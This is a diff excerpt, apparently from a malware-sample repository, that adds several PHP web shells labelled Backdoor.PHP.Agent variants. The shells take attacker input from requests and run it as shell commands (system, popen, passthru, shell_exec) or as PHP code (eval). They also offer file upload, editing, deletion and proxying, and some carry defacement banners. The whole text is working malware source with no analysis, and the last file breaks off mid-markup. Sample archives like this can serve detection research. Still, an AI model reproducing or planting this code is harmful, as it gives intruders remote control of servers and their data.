$this->file = htmlentities(highlight_file($this->file));
|
||||||
|
}
|
||||||
|
|
||||||
|
function edit() {
|
||||||
|
if(!is_writable($this->edit)) {
|
||||||
|
echo "Ecriture impossible sur le fichier";
|
||||||
|
} elseif(!file_exists($this->edit)) {
|
||||||
|
echo "Le fichier n'existe pas ";
|
||||||
|
} elseif(!$this->fichier) {
|
||||||
|
$fp = fopen($this->edit,"r");
|
||||||
|
$a = "";
|
||||||
|
while(!feof($fp)) {
|
||||||
|
$a .= fgets($fp,1024);
|
||||||
|
}
|
||||||
|
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
|
||||||
|
} else {
|
||||||
|
$fp = fopen($this->edit,"w+");
|
||||||
|
fwrite($fp, $this->fichier);
|
||||||
|
fclose($fp);
|
||||||
|
echo "Le fichier a été modifié";
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function del() {
|
||||||
|
if(is_file($this->del)) {
|
||||||
|
if(unlink($this->del)) {
|
||||||
|
echo "Fichier supprimé";
|
||||||
|
} else {
|
||||||
|
echo "Vous n'avez pas les droits pour supprimer ce fichier";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
echo $this->del." n'est pas un fichier";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function shell() {
|
||||||
|
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
|
||||||
|
system($this->shell);
|
||||||
|
}
|
||||||
|
|
||||||
|
function proxy($host,$page) {
|
||||||
|
|
||||||
|
$fp = fsockopen($host,80);
|
||||||
|
if (!$fp) {
|
||||||
|
echo "impossible d'etablir un connection avec l'host";
|
||||||
|
} else {
|
||||||
|
$header = "GET ".$page." HTTP/1.1\r\n";
|
||||||
|
$header .= "Host: ".$host."\r\n";
|
||||||
|
$header .= "Connection: close\r\n\r\n";
|
||||||
|
fputs($fp,$header);
|
||||||
|
while (!feof($fp)) {
|
||||||
|
$line = fgets($fp,1024);
|
||||||
|
echo $line;
|
||||||
|
}
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function ccopy($cfichier,$cdestination) {
|
||||||
|
if(!empty($cfichier) && !empty($cdestination)) {
|
||||||
|
copy($cfichier, $cdestination);
|
||||||
|
echo "Le fichier a été copié";
|
||||||
|
} else {
|
||||||
|
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if(!empty($_REQUEST['rep'])) {
|
||||||
|
$rep = $_REQUEST['rep']."/";
|
||||||
|
}
|
||||||
|
$pwd = $_SERVER['SCRIPT_FILENAME'];
|
||||||
|
$pwd2 = explode("/",$pwd);
|
||||||
|
$file = $_REQUEST['file'];
|
||||||
|
$edit = $_REQUEST['edit'];
|
||||||
|
$fichier = $_POST['fichier'];
|
||||||
|
$del = $_REQUEST['del'];
|
||||||
|
$shell = $_REQUEST['shell'];
|
||||||
|
$proxy = $_REQUEST['proxy'];
|
||||||
|
$copy = $_REQUEST['copy'];
|
||||||
|
$cfichier = $_POST['cfichier'];
|
||||||
|
$cdestination = $_POST['cdestination'];
|
||||||
|
|
||||||
|
$n = count($pwd2);
|
||||||
|
$n = $n - 1;
|
||||||
|
$pwd = "";
|
||||||
|
for ($i = 0;$i != $n;$i = $i+1) {
|
||||||
|
$pwd .= "/".$pwd2[$i];
|
||||||
|
}
|
||||||
|
|
||||||
|
if($proxy) {
|
||||||
|
$host2 = explode("/",$proxy);
|
||||||
|
$n = count($host2);
|
||||||
|
$host = $host2[2];
|
||||||
|
$page = "";
|
||||||
|
for ($i = 3;$i != $n;$i = $i+1) {
|
||||||
|
$page .= "/".$host2[$i];
|
||||||
|
}
|
||||||
|
echo $page;
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
|
||||||
|
$backdoor = new backdoor();
|
||||||
|
$backdoor->pwd = $pwd;
|
||||||
|
$backdoor->rep = $rep;
|
||||||
|
$backdoor->file = $file;
|
||||||
|
$backdoor->edit = $edit;
|
||||||
|
$backdoor->fichier = $fichier;
|
||||||
|
$backdoor->del = $del;
|
||||||
|
$backdoor->shell = $shell;
|
||||||
|
$backdoor->proxy = $proxy;
|
||||||
|
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
|
||||||
|
$backdoor->dir();
|
||||||
|
|
||||||
|
echo "</TD></TR></TABLE><PRE>";
|
||||||
|
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
|
||||||
|
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
|
||||||
|
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
|
||||||
|
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
|
||||||
|
echo "<HR noshade align=\"left\" width=\"80%\">";
|
||||||
|
|
||||||
|
if($file) {
|
||||||
|
$backdoor->view();
|
||||||
|
} elseif($edit) {
|
||||||
|
$backdoor->edit();
|
||||||
|
} elseif($del) {
|
||||||
|
$backdoor->del();
|
||||||
|
} elseif($shell) {
|
||||||
|
$backdoor->shell();
|
||||||
|
}elseif($proxy) {
|
||||||
|
$backdoor->proxy($host,$page);
|
||||||
|
}elseif($copy == 1) {
|
||||||
|
$backdoor->ccopy($cfichier,$cdestination);
|
||||||
|
} else {
|
||||||
|
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
|
||||||
|
foreach ($backdoor->list as $key => $value) {
|
||||||
|
if(is_dir($rep.$value)) {
|
||||||
|
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
|
||||||
|
} else {
|
||||||
|
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
|
||||||
|
echo "<center><b>Coded By Charlichaplin</b></center>";
|
||||||
|
echo "</BODY></HTML>";
|
89
PHP/Backdoor.PHP.Agent.n
Normal file
89
PHP/Backdoor.PHP.Agent.n
Normal file
@ -0,0 +1,89 @@
|
|||||||
|
<?
|
||||||
|
if($_POST['dir'] == "") {
|
||||||
|
|
||||||
|
$curdir = `pwd`;
|
||||||
|
} else {
|
||||||
|
$curdir = $_POST['dir'];
|
||||||
|
}
|
||||||
|
|
||||||
|
if($_POST['king'] == "") {
|
||||||
|
|
||||||
|
$curcmd = "ls -lah";
|
||||||
|
} else {
|
||||||
|
$curcmd = $_POST['king'];
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
|
||||||
|
"http://www.w3.org/TR/html4/loose.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>lama's'hell v. 3.0</title>
|
||||||
|
<style type="text/css">
|
||||||
|
body {
|
||||||
|
color: white; background-color: black;
|
||||||
|
font-size: 12px;
|
||||||
|
font-family: Helvetica,Arial,Sans-Serif;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<pre>
|
||||||
|
_ _
|
||||||
|
/ \_______ /|_\
|
||||||
|
/ /_/ \__
|
||||||
|
/ \_/ /
|
||||||
|
_|_ |/|_
|
||||||
|
_|_ O _ O _|_
|
||||||
|
_|_ (_) _|_
|
||||||
|
\ /
|
||||||
|
_\_____________/_
|
||||||
|
/ \/ (___) \/ \
|
||||||
|
\__( o o )__/ <?
|
||||||
|
$ob = @ini_get("open_basedir");
|
||||||
|
$df = @ini_get("disable_functions");
|
||||||
|
if( ini_get('safe_mode') ) {
|
||||||
|
echo "SM: 1 \\ ";
|
||||||
|
} else {
|
||||||
|
echo "SM: 0 \\ ";
|
||||||
|
}
|
||||||
|
if(''==$df) {
|
||||||
|
echo "DF: 0 \\ ";
|
||||||
|
} else {
|
||||||
|
echo "DF: ".$df." \\ ";
|
||||||
|
}
|
||||||
|
echo "".php_uname()."\n";
|
||||||
|
?>
|
||||||
|
<hr></pre>
|
||||||
|
<table><form method="post" enctype="multipart/form-data">
|
||||||
|
<tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
|
||||||
|
<tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
|
||||||
|
<td><input name="exe" type="submit" value="Execute"></td></tr>
|
||||||
|
|
||||||
|
<tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
|
||||||
|
<td><input name="upl" type="submit" value="Upload"></td></tr>
|
||||||
|
</form></table>
|
||||||
|
<pre><hr>
|
||||||
|
<?
|
||||||
|
if(($_POST['upl']) == "Upload" ) {
|
||||||
|
if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
|
||||||
|
echo "The file has been uploaded<br><br>";
|
||||||
|
} else {
|
||||||
|
echo "There was an error uploading the file, please try again!";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if(($_POST['exe']) == "Execute") {
|
||||||
|
$curcmd = "cd ".$curdir.";".$curcmd;
|
||||||
|
$f=popen($curcmd,"r");
|
||||||
|
while (!feof($f)) {
|
||||||
|
$buffer = fgets($f, 4096);
|
||||||
|
$string .= $buffer;
|
||||||
|
}
|
||||||
|
pclose($f);
|
||||||
|
echo htmlspecialchars($string);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
229
PHP/Backdoor.PHP.Agent.o
Normal file
229
PHP/Backdoor.PHP.Agent.o
Normal file
@ -0,0 +1,229 @@
|
|||||||
|
<!--
|
||||||
|
|
||||||
|
/+--------------------------------+\
|
||||||
|
| KA_uShell |
|
||||||
|
| <KAdot Universal Shell> |
|
||||||
|
| Version 0.1.6 |
|
||||||
|
| 13.03.04 |
|
||||||
|
| Author: KAdot <KAdot@ngs.ru> |
|
||||||
|
|--------------------------------|
|
||||||
|
\+ +/
|
||||||
|
|
||||||
|
-->
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>KA_uShell 0.1.6</title>
|
||||||
|
<style type="text/css">
|
||||||
|
<!--
|
||||||
|
body, table{font-family:Verdana; font-size:12px;}
|
||||||
|
table {background-color:#EAEAEA; border-width:0px;}
|
||||||
|
b {font-family:Arial; font-size:15px;}
|
||||||
|
a{text-decoration:none;}
|
||||||
|
-->
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
$self = $_SERVER['PHP_SELF'];
|
||||||
|
$docr = $_SERVER['DOCUMENT_ROOT'];
|
||||||
|
$sern = $_SERVER['SERVER_NAME'];
|
||||||
|
$tend = "</tr></form></table><br><br><br><br>";
|
||||||
|
|
||||||
|
// Configuration
|
||||||
|
$login = "admin";
|
||||||
|
$pass = "123";
|
||||||
|
|
||||||
|
|
||||||
|
/*/ Authentication
|
||||||
|
if (!isset($_SERVER['PHP_AUTH_USER'])) {
|
||||||
|
header('WWW-Authenticate: Basic realm="KA_uShell"');
|
||||||
|
header('HTTP/1.0 401 Unauthorized');
|
||||||
|
exit;}
|
||||||
|
|
||||||
|
else {
|
||||||
|
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
|
||||||
|
{ echo "×òî íàäî?"; exit;}
|
||||||
|
}
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
|
||||||
|
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
|
||||||
|
else {$ac = "shell";}
|
||||||
|
|
||||||
|
// Menu
|
||||||
|
echo "
|
||||||
|
|<a href=$self?ac=shell>Shell</a>|
|
||||||
|
|<a href=$self?ac=upload>File Upload</a>|
|
||||||
|
|<a href=$self?ac=tools>Tools</a>|
|
||||||
|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|
||||||
|
|<a href=$self?ac=whois>Whois</a>|
|
||||||
|
<br><br><br><pre>";
|
||||||
|
|
||||||
|
|
||||||
|
switch($ac) {
|
||||||
|
|
||||||
|
// Shell
|
||||||
|
case "shell":
|
||||||
|
|
||||||
|
echo <<<HTML
|
||||||
|
<b>Shell</b>
|
||||||
|
<table>
|
||||||
|
<form action="$self" method="POST">
|
||||||
|
<input type="hidden" name="ac" value="shell">
|
||||||
|
<tr><td>
|
||||||
|
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
|
||||||
|
</td></tr>
|
||||||
|
<tr><td>
|
||||||
|
<textarea cols="100" rows="25">
|
||||||
|
HTML;
|
||||||
|
|
||||||
|
if (!empty($_POST['c'])){
|
||||||
|
passthru($_POST['c']);
|
||||||
|
}
|
||||||
|
echo "</textarea></td>$tend";
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
//PHP Eval Code execution
|
||||||
|
case "eval":
|
||||||
|
|
||||||
|
echo <<<HTML
|
||||||
|
<b>PHP Eval Code</b>
|
||||||
|
<table>
|
||||||
|
<form method="POST" action="$self">
|
||||||
|
<input type="hidden" name="ac" value="eval">
|
||||||
|
<tr>
|
||||||
|
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><input type="submit" value="Enter"></td>
|
||||||
|
$tend
|
||||||
|
HTML;
|
||||||
|
|
||||||
|
if (isset($_POST['ephp'])){
|
||||||
|
eval($_POST['ephp']);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
//Text tools
|
||||||
|
case "tools":
|
||||||
|
|
||||||
|
echo <<<HTML
|
||||||
|
<b>Tools</b>
|
||||||
|
<table>
|
||||||
|
<form method="POST" action="$self">
|
||||||
|
<input type="hidden" name="ac" value="tools">
|
||||||
|
<tr>
|
||||||
|
<td>
|
||||||
|
<input type="radio" name="tac" value="1">B64 Decode<br>
|
||||||
|
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
|
||||||
|
<input type="radio" name="tac" value="3">md5 Hash
|
||||||
|
</td>
|
||||||
|
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td> </td>
|
||||||
|
<td><input type="submit" value="Enter"></td>
|
||||||
|
$tend
|
||||||
|
HTML;
|
||||||
|
|
||||||
|
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
|
||||||
|
|
||||||
|
switch($_POST['tac']) {
|
||||||
|
|
||||||
|
case "1":
|
||||||
|
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "2":
|
||||||
|
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "3":
|
||||||
|
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
|
||||||
|
break;
|
||||||
|
}}
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
// Uploading
|
||||||
|
case "upload":
|
||||||
|
|
||||||
|
echo <<<HTML
|
||||||
|
<b>File Upload</b>
|
||||||
|
<table>
|
||||||
|
<form enctype="multipart/form-data" action="$self" method="POST">
|
||||||
|
<input type="hidden" name="ac" value="upload">
|
||||||
|
<tr>
|
||||||
|
<td>Ôàéëî:</td>
|
||||||
|
<td><input size="48" name="file" type="file"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td>Ïàïêà:</td>
|
||||||
|
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
|
||||||
|
$tend
|
||||||
|
HTML;
|
||||||
|
|
||||||
|
if (isset($_POST['path'])){
|
||||||
|
|
||||||
|
$uploadfile = $_POST['path'].$_FILES['file']['name'];
|
||||||
|
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
||||||
|
|
||||||
|
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
|
||||||
|
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
|
||||||
|
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
|
||||||
|
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
|
||||||
|
|
||||||
|
} else {
|
||||||
|
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
|
||||||
|
print_r($_FILES);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
// Whois
|
||||||
|
case "whois":
|
||||||
|
echo <<<HTML
|
||||||
|
<b>Whois</b>
|
||||||
|
<table>
|
||||||
|
<form action="$self" method="POST">
|
||||||
|
<input type="hidden" name="ac" value="whois">
|
||||||
|
<tr>
|
||||||
|
<td>Äîìåí:</td>
|
||||||
|
<td><input size="40" type="text" name="wq"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td>Õóéç ñåðâåð:</td>
|
||||||
|
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
|
||||||
|
</tr>
|
||||||
|
<tr><td>
|
||||||
|
<input align="right" type="submit" value="Enter">
|
||||||
|
</td></tr>
|
||||||
|
$tend
|
||||||
|
HTML;
|
||||||
|
|
||||||
|
if (isset($_POST['wq']) && $_POST['wq']<>"") {
|
||||||
|
|
||||||
|
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
|
||||||
|
|
||||||
|
$querty = $_POST['wq']."\r\n";
|
||||||
|
$fp = fsockopen($wser, 43);
|
||||||
|
|
||||||
|
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
|
||||||
|
fputs($fp, $querty);
|
||||||
|
while(!feof($fp)){echo fgets($fp, 4000);}
|
||||||
|
fclose($fp);
|
||||||
|
}}
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
1033
PHP/Backdoor.PHP.Agent.p
Normal file
1033
PHP/Backdoor.PHP.Agent.p
Normal file
File diff suppressed because it is too large
Load Diff
1231
PHP/Backdoor.PHP.Agent.r
Normal file
1231
PHP/Backdoor.PHP.Agent.r
Normal file
File diff suppressed because it is too large
Load Diff
1492
PHP/Backdoor.PHP.Agent.s
Normal file
1492
PHP/Backdoor.PHP.Agent.s
Normal file
File diff suppressed because it is too large
Load Diff
60
PHP/Backdoor.PHP.Agent.u
Normal file
60
PHP/Backdoor.PHP.Agent.u
Normal file
@ -0,0 +1,60 @@
|
|||||||
|
<center>
|
||||||
|
<h1>.:NCC:. Shell v1.0.0</h1>
|
||||||
|
<title>.:NCC:. Shell v1.0.0</title>
|
||||||
|
<head><h2>Hacked by Silver</h2></head>
|
||||||
|
<h1>---------------------------------------------------------------------------------------</h1><br>
|
||||||
|
<b><font color=red>---Server Info---</font></b><br>
|
||||||
|
<?php
|
||||||
|
echo "<b><font color=red>Safe Mode on/off: </font></b>";
|
||||||
|
// Check for safe mode
|
||||||
|
if( ini_get('safe_mode') ) {
|
||||||
|
print '<font color=#FF0000><b>Safe Mode ON</b></font>';
|
||||||
|
} else {
|
||||||
|
print '<font color=#008000><b>Safe Mode OFF</b></font>';
|
||||||
|
}
|
||||||
|
echo "</br>";
|
||||||
|
echo "<b><font color=red>Momentane Directory: </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
|
||||||
|
echo "</br>";
|
||||||
|
echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
|
||||||
|
echo "<a href='$php_self?p=info'>PHPinfo</a>";
|
||||||
|
if(@$_GET['p']=="info"){
|
||||||
|
@phpinfo();
|
||||||
|
exit;}
|
||||||
|
?>
|
||||||
|
<h1>---------------------------------------------------------------------------</h1><br>
|
||||||
|
<h2>- Upload -</h2>
|
||||||
|
<title>Upload - Shell/Datei</title>
|
||||||
|
<form
|
||||||
|
action="<?php echo $_SERVER['PHP_SELF']; ?>"
|
||||||
|
method="post"
|
||||||
|
enctype="multipart/form-data">
|
||||||
|
<input type="file" name="Upload" />
|
||||||
|
<input type="submit" value="Upload!" />
|
||||||
|
</form>
|
||||||
|
<hr />
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
|
||||||
|
// Alternativ: and $_FILES['probe']['size']
|
||||||
|
move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
|
||||||
|
printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
|
||||||
|
$_FILES['probe']['name']);
|
||||||
|
printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
|
||||||
|
$_FILES['probe']['size'], $_FILES['probe']['type']);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<h1>---------------------------------------------------------------------------</h1><br>
|
||||||
|
<h2>IpLogger</h2>
|
||||||
|
<?php
|
||||||
|
echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
|
||||||
|
echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
|
||||||
|
echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
|
||||||
|
echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
|
||||||
|
?>
|
||||||
|
<h1>---------------------------------------------------------------------------</h1><br>
|
||||||
|
<h2>Directory Lister</h2>
|
||||||
|
<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
|
||||||
|
<h1>---------------------------------------------------------------------------</h1><br>
|
||||||
|
<b>--Coded by Silver©--<br>
|
||||||
|
~|_Team .:National Cracker Crew:._|~<br>
|
||||||
|
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>
|
317
PHP/Backdoor.PHP.Agent.v
Normal file
317
PHP/Backdoor.PHP.Agent.v
Normal file
@ -0,0 +1,317 @@
|
|||||||
|
<html>
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||||
|
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||||
|
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz Büyük Türk Milletinin Hizmetindeyiz...</title>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta name="distribution" content="GLOBAL">
|
||||||
|
<META name="ROBOTS" content="ALL">
|
||||||
|
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
|
||||||
|
<meta name="Copyright" content=TouCh By iJOo">
|
||||||
|
<META NAME="RATING" CONTENT="GENERAL">
|
||||||
|
<meta name="Description" content="Thehacker">
|
||||||
|
<meta name="KeyWords" content="DefaCed">
|
||||||
|
<title>HACKED BY AYYILDIZ ™</title>
|
||||||
|
<STYLE TYPE="text/css">
|
||||||
|
<!--
|
||||||
|
|
||||||
|
body {
|
||||||
|
scrollbar-3d-light-color : #404040;
|
||||||
|
scrollbar-arrow-color: black;
|
||||||
|
scrollbar-base-color: black;
|
||||||
|
scrollbar-darkshadow-color: #404040;
|
||||||
|
scrollbar-face-color: black;
|
||||||
|
scrollbar-highlight-color: #404040;
|
||||||
|
scrollbar-shadow-color: black;
|
||||||
|
scrollbar-track-color: #404040; }
|
||||||
|
-->
|
||||||
|
</STYLE>
|
||||||
|
<script language="JavaScript1.2">
|
||||||
|
function disableselect(e){
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
function reEnable(){
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
//if IE4+
|
||||||
|
document.onselectstart=new Function ("return false")
|
||||||
|
//if NS6
|
||||||
|
if (window.sidebar){
|
||||||
|
document.onmousedown=disableselect
|
||||||
|
document.onclick=reEnable
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
|
||||||
|
|
||||||
|
</head>
|
||||||
|
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
|
||||||
|
<bgsound src="bayrak.mp3" loop="infinite">
|
||||||
|
|
||||||
|
<center><font color="red" size="10" face="Imprint MT Shadow">
|
||||||
|
</font>
|
||||||
|
<TR>
|
||||||
|
<TD vAlign=center align=left width=144>
|
||||||
|
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
|
||||||
|
</TD>
|
||||||
|
<TD vAlign=center align=left width=5></TD>
|
||||||
|
<TD width=470><BR>
|
||||||
|
<P align=left></P></TD></TR>
|
||||||
|
<TR>
|
||||||
|
<TD vAlign=center align=left width=144></TD>
|
||||||
|
<TD vAlign=center align=left width=5></TD>
|
||||||
|
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
|
||||||
|
<STYLE>BODY {
|
||||||
|
BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
|
||||||
|
}
|
||||||
|
.ldtab1 {
|
||||||
|
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
|
||||||
|
}
|
||||||
|
.ldtab2 {
|
||||||
|
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
|
||||||
|
}
|
||||||
|
.ldtab3 {
|
||||||
|
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
|
||||||
|
}
|
||||||
|
.ldtxt1 {
|
||||||
|
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
|
||||||
|
}
|
||||||
|
.ldtxt2 {
|
||||||
|
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||||
|
}
|
||||||
|
A:link {
|
||||||
|
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||||
|
}
|
||||||
|
A:visited {
|
||||||
|
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||||
|
}
|
||||||
|
A:active {
|
||||||
|
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
|
||||||
|
}
|
||||||
|
A:hover {
|
||||||
|
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
|
||||||
|
}
|
||||||
|
A {
|
||||||
|
TEXT-DECORATION: none
|
||||||
|
}
|
||||||
|
</STYLE>
|
||||||
|
<!-- MELEK -->
|
||||||
|
<DIV align=center>
|
||||||
|
<DIV id=welle
|
||||||
|
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
|
||||||
|
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
|
||||||
|
